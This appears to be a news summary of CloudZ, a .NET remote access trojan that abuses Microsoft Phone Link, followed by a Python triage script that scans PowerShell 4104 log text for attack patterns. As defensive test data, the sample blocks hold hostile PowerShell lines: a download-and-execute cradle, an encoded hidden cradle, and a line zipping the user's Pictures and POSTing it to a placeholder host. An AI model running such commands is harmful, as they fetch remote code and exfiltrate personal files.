
"CloudZ is a modular Remote Access Trojan (RAT), compiled as a .NET executable and equipped with a range of defenses against analysis and reverse engineering, including obfuscation and the detection of debuggers and profilers in its environment."
"The malware loads its instructions into memory during execution, establishes a connection to a command-and-control (C2) server, and executes PowerShell scripts to extract, download, and exfiltrate data to the attacker-controlled C2 server."
"If CloudZ has infected a Windows PC, it can spy on these systems using the newly-discovered 'Pheno' plugin."
CloudZ is a modular Remote Access Trojan (RAT) that abuses Microsoft Phone Link to intercept sensitive information. It has been active since January 2026; its initial entry point remains unclear. The malware is a .NET executable with defenses against analysis and reverse engineering (obfuscation plus detection of debuggers and profilers). At runtime it loads its instructions into memory, connects to a command-and-control (C2) server, and runs PowerShell scripts to collect, download, and exfiltrate data to that server. Microsoft Phone Link, preinstalled on Windows 10 and 11, lets users link their phones to a PC, and it is this feature CloudZ abuses: on an infected PC the newly discovered Pheno plugin spies on the system.
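The summary says CloudZ stages its work through PowerShell (download, in-memory execution, exfiltration), and PowerShell Script Block Logging (Event ID 4104) is the usual place such activity surfaces. The following is an added triage example, not code from the ZDNET piece or from the CloudZ sample; it scans constructed 4104-style script blocks for generic PowerShell tradecraft (download cradles, Invoke-Expression, reflective assembly loading, HTTP uploads, hidden-window and no-profile switches) and decodes `-EncodedCommand` payloads before scanning them. The patterns are generic post-exploitation idioms, not published CloudZ indicators, and the sample blocks, URLs and paths are made up for illustration.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass
from typing import Optional

# Generic PowerShell tradecraft patterns. These are common post-exploitation
# idioms (assumption: useful as a first triage pass), NOT CloudZ-specific IOCs.
PATTERNS = {
    "download_cradle": re.compile(
        r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b", re.I),
    "in_memory_exec": re.compile(
        r"Invoke-Expression|\bIEX\b|\[System\.Reflection\.Assembly\]|Reflection\.Assembly\]::Load", re.I),
    "http_upload": re.compile(
        r"Invoke-RestMethod[^\n]*-Method\s+Post|UploadFile|UploadData|UploadString", re.I),
    "archive_staging": re.compile(r"Compress-Archive", re.I),
    "evasion_switch": re.compile(
        r"-nop\b|-NoProfile|-w(indowstyle)?\s+hidden|-ep\s+bypass|-ExecutionPolicy\s+Bypass", re.I),
}

# -EncodedCommand / -enc / -ec take base64 of a UTF-16LE script.
ENCODED = re.compile(r"-(?:EncodedCommand|enc|ec)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Finding:
    index: int                    # position of the script block in the input list
    tags: list                    # sorted pattern names that matched
    decoded: Optional[str] = None # decoded -EncodedCommand payload, if any


def decode_encoded_command(block: str) -> Optional[str]:
    """Return the decoded script behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED.search(block)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_block(index: int, block: str) -> Optional[Finding]:
    """Scan one script block (plus its decoded payload) and report matching patterns."""
    decoded = decode_encoded_command(block)
    text = block + ("\n" + decoded if decoded else "")
    tags = [name for name, rx in PATTERNS.items() if rx.search(text)]
    if decoded is not None:
        tags.append("encoded_command")
    return Finding(index, sorted(tags), decoded) if tags else None


def triage(blocks: list[str]) -> list[Finding]:
    """Return findings for every script block that matched at least one pattern."""
    return [f for f in (triage_block(i, b) for i, b in enumerate(blocks)) if f]


def build_samples() -> list[str]:
    """Constructed script-block text modelled on Event ID 4104 payloads (not real logs)."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return [
        "Get-ChildItem C:\\Users\\alice\\Documents | Select-Object Name,Length",
        "$c = New-Object Net.WebClient; $c.DownloadString('http://198.51.100.7/stage2.ps1') | IEX",
        f"powershell.exe -nop -w hidden -enc {enc}",
        "Compress-Archive -Path $env:USERPROFILE\\Pictures -DestinationPath $env:TEMP\\p.zip; "
        "Invoke-RestMethod -Uri 'http://198.51.100.7/up' -Method Post -InFile $env:TEMP\\p.zip",
        "Get-Service | Where-Object Status -eq 'Running'",
    ]


if __name__ == "__main__":
    for f in triage(build_samples()):
        print(f"block {f.index}: {', '.join(f.tags)}")
        if f.decoded:
            print(f"  decoded: {f.decoded}")
```

In production you would feed `triage` the `ScriptBlockText` field of 4104 events exported from the Microsoft-Windows-PowerShell/Operational log (Script Block Logging must be enabled by policy first); the benign `Get-ChildItem` and `Get-Service` blocks produce no finding, while the cradle, the encoded command and the archive-then-POST block each do.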
Read at ZDNET